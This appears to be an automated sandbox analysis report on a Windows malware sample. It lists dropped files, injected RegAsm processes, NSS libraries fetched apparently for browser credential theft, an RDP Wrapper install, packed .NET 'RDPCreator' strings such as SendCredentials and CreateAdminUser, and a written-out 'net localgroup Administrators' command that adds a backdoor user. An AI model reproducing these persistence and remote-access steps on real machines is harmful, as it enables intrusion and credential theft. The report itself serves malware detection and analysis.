Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File written: C:\Program Files\RDP Wrapper\rdpwrap.ini

Source: C:\ProgramData\CFHIIEHJKK.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.6.dr
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2148470094.000000006FA8D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.6.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.6.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.6.dr
Source:	Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr
Source:	Binary string: costura.costura.pdb.compressedlB source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySy
Source:	Binary string: costura.costura.pdb.compressed source: CFHIIEHJKK.exe, 00000014.00000000.2001873722.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, CFHIIEHJKK.exe.6.dr, 66f5de72d9ebd_rdp[1].exe.6.dr
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr
Source:	Binary string: c:\rje\tg\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr
Source:	Binary string: RfxVmt.pdb source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, rfxvmt.dll.30.dr, RDPWInst.exe.20.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000006.00000002.2107878722.00000000385C6000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.6.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000006.00000002.2096547544.000000002C6F4000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.6.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.6.dr
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2462772884.0000000007FFB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2148470094.000000006FA8D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.6.dr
Source:	Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, rfxvmt.dll.30.dr, RDPWInst.exe.20.dr
Source:	Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: CFHIIEHJKK.exe, 00000014.00000000.2001873722.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, CFHIIEHJKK.exe.6.dr, 66f5de72d9ebd_rdp[1].exe.6.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 66f5de72d9ebd_rdp[1].exe.6.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: CFHIIEHJKK.exe.6.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 20.0.CFHIIEHJKK.exe.c10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000000.2001873722.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CFHIIEHJKK.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\CFHIIEHJKK.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5de72d9ebd_rdp[1].exe, type: DROPPED

Source: 66f5de72d9ebd_rdp[1].exe.6.dr

Static PE information: 0xC7AB998F [Wed Feb 26 03:05:51 2076 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_00418950

Source: freebl3.dll.6.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.6.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.6.dr	Static PE information: section name: .didat
Source: softokn3.dll.6.dr	Static PE information: section name: .00cfg
Source: nss3.dll.6.dr	Static PE information: section name: .00cfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042F142 push ecx; ret	6_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00422D3B push esi; ret	6_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041DDB5 push ecx; ret	6_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00432715 push 0000004Ch; iretd	6_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0044F116 push esi; retf	16_2_0044F117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00438B7E push cs; iretd	16_2_00438B85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F9D568 push esp; retf	19_2_07F9D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07FAF456 push ebx; ret	19_2_07FAF457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F9DB66 push esp; retf	19_2_07F9DB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F33C51 push es; retf	19_2_07F33C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07E029DE push edi; retn 0000h	19_2_07E029E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F6A45D push esi; ret	19_2_07F6A45F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_07F64BF0 push ecx; ret	19_2_07F64C03

Source: file.exe	Static PE information: section name: .text entropy: 7.995779968314273
Source: GIEHJDHCBA.exe.6.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: BKKFCFBKFC.exe.6.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: 66f5db9e54794_vfkagks[1].exe.6.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: 66f5de72d9ebd_rdp[1].exe.6.dr	Static PE information: section name: .text entropy: 7.766648877286933
Source: CFHIIEHJKK.exe.6.dr	Static PE information: section name: .text entropy: 7.766648877286933

Persistence and Installation Behavior

Adds a new user with administrator rights

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_0d457744 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_0d457744 /add

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKKFCFBKFC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GIEHJDHCBA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5de72d9ebd_rdp[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5db9e54794_vfkagks[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\ProgramData\CFHIIEHJKK.exe	File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5dbaca34ac_lfdnsafnds[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CFHIIEHJKK.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKKFCFBKFC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GIEHJDHCBA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CFHIIEHJKK.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Jump to dropped file

Source: C:\Windows\System32\drivers\tsusbhub.sys

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

6_2_00418950

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CFHIIEHJKK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 2.2.file.exe.41f5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.41f5570.1.unpack, type: UNPACKEDPE
